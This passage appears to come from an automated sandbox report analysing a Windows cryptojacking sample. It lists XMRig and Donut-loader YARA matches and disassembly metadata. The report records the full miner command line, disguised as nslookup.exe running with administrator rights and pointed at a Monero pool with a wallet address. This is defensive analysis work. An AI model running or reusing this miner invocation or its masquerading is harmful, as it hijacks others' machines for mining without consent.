                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:06:42:07
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\nslookup.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                                                                Imagebase:0x7ff7ba020000
                                                                File size:89'600 bytes
                                                                MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:13
                                                                Start time:06:42:08
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\nslookup.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
                                                                Imagebase:0x7ff7ba020000
                                                                File size:89'600 bytes
                                                                MD5 hash:F2E3950C1023ACF80765C918791999C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:14
                                                                Start time:06:42:09
                                                                Start date:30/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\conhost.exe" "/sihost64"
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Donutloader_5c38878d, Description: unknown, Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:29.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:15
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 291 4023f2 _controlfp 292 4010c4 2 API calls 291->292 293 402473 292->293 277 4022fa 278 40232c 277->278 281 40224f 278->281 280 4023e5 282 402285 281->282 285 4010c4 282->285 284 4022be 284->280 286 402480 285->286 287 4010e7 memset 286->287 288 40115b 287->288 289 401214 sprintf 288->289 290 4012bd 289->290 290->284

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00401443 1 Function_004010C4 15 Function_004019D8 1->15 16 Function_00401D58 1->16 34 Function_00401000 1->34 49 Function_00401C98 1->49 50 Function_00401D98 1->50 51 Function_00401D18 1->51 2 Function_004017C6 3 Function_004024C7 4 Function_004022CB 5 Function_0040224F 5->1 19 Function_00402158 5->19 27 Function_004021EC 5->27 6 Function_0062346D 7 Function_00623E76 8 Function_00401BD8 28 Function_004018EF 8->28 9 Function_00401F58 9->28 10 Function_00401DD8 10->28 11 Function_00401C58 11->28 12 Function_00401B58 12->28 13 Function_00401AD8 13->28 14 Function_00401A58 14->28 15->28 16->28 17 Function_00401CD8 17->28 18 Function_00402058 18->28 20 Function_004020D8 20->28 21 Function_00401FD8 21->28 22 Function_00401E58 22->28 23 Function_00401ED8 23->28 24 Function_00623678 25 Function_006230C0 26 Function_004021E5 65 Function_004014B4 28->65 29 Function_00401970 30 Function_004023F2 30->1 31 Function_00402477 32 Function_00623CDA 33 Function_004022FA 33->5 35 Function_00623D22 36 Function_00401784 37 Function_00402487 38 Function_006234AC 39 Function_006236B7 40 Function_00402497 41 Function_00401F18 41->28 42 Function_00402018 42->28 43 Function_00401C18 43->28 44 Function_00401A98 44->28 45 Function_00401B98 45->28 46 Function_00401B18 46->28 47 Function_00401A18 47->28 48 Function_00401998 48->28 49->28 50->28 51->28 52 Function_00402118 52->28 53 Function_00402098 53->28 54 Function_00401F98 54->28 55 Function_00401E18 55->28 56 Function_00401E98 56->28 57 Function_006232B8 58 Function_00623686 59 Function_00623004 60 Function_00623384 61 Function_004024A7 62 Function_00623D8A 63 Function_00623989 64 Function_00623290 65->0 65->29 66 Function_004024B7 67 Function_00623D9A 68 Function_004010BD

                                                                  Executed Functions

                                                                  Function 004010C4 Relevance: 4.7, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID: 8]GDXE
                                                                  • API String ID: 4041149307-2632714434
                                                                  • Opcode ID: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                  • Instruction ID: 39431a9c6eb76416a74e9ecc622619c51ee20e8814d728a91cb63a132b490c0f
                                                                  • Opcode Fuzzy Hash: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                  • Instruction Fuzzy Hash: 4E712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744
                                                                  Function 00401000 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 33 401000-401045 call 402478 36 401048-401050 33->36 37 4010b6-4010bb 36->37 38 401056-4010b4 36->38 38->36
                                                                  Strings
                                                                  • k$40=(3s))q96e/n7_m:f6,6=q!l6jun, xrefs: 00401098
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: k$40=(3s))q96e/n7_m:f6,6=q!l6jun
                                                                  • API String ID: 0-4154810256
                                                                  • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                                  • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                                  • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                                  Function 004022FA Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                  • Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
                                                                  • Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                                  • Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344
                                                                  Function 0040224F Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 56 40224f-4022ca call 402158 call 4010c4 call 4021ec
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID: memsetsprintf
                                                                  • String ID:
                                                                  • API String ID: 4041149307-0
                                                                  • Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                  • Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
                                                                  • Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                                  • Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744

                                                                  Non-executed Functions

                                                                  Function 00401D58 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                  • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                                  • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                                  • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                                  Function 00401D18 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                  • Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
                                                                  • Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
                                                                  • Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54
                                                                  Function 004019D8 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                  • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                                  • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                                  • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                                  Function 00401D98 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                  • Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
                                                                  • Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
                                                                  • Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54
                                                                  Function 00401C98 Relevance: .0, Instructions: 15COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1692169062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1692155813.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692182244.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1692330299.0000000000623000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_boooba.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                  • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
                                                                  • Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                                  • Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54

                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:42.9%
                                                                  Total number of Nodes:21
                                                                  Total number of Limit Nodes:2
                                                                  execution_graph 2290 1575946e106 2292 1575946e128 2290->2292 2291 1575946e17c 2292->2291 2293 1575946e254 LoadLibraryA 2292->2293 2294 1575946e269 2292->2294 2293->2292 2294->2291 2301 1575946e31d 2294->2301 2309 1575946d2a2 2294->2309 2296 1575946e2f3 2297 1575946e2f7 2296->2297 2302 1575946d3ba LoadLibraryA 2296->2302 2297->2291 2297->2296 2300 1575946e30c 2300->2291 2300->2301 2301->2291 2304 1575946deb2 2301->2304 2303 1575946d3df 2302->2303 2303->2300 2305 1575946def2 CLRCreateInstance 2304->2305 2307 1575946df0b 2304->2307 2305->2307 2306 1575946e0b2 2306->2291 2307->2306 2308 1575946e0a9 SafeArrayDestroy 2307->2308 2308->2306 2310 1575946d2af LoadLibraryA 2309->2310 2311 1575946d2c7 2310->2311 2311->2296 2312 1575946d2af LoadLibraryA 2313 1575946d2c7 2312->2313

                                                                  Executed Functions

                                                                  Function 000001575946E106 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
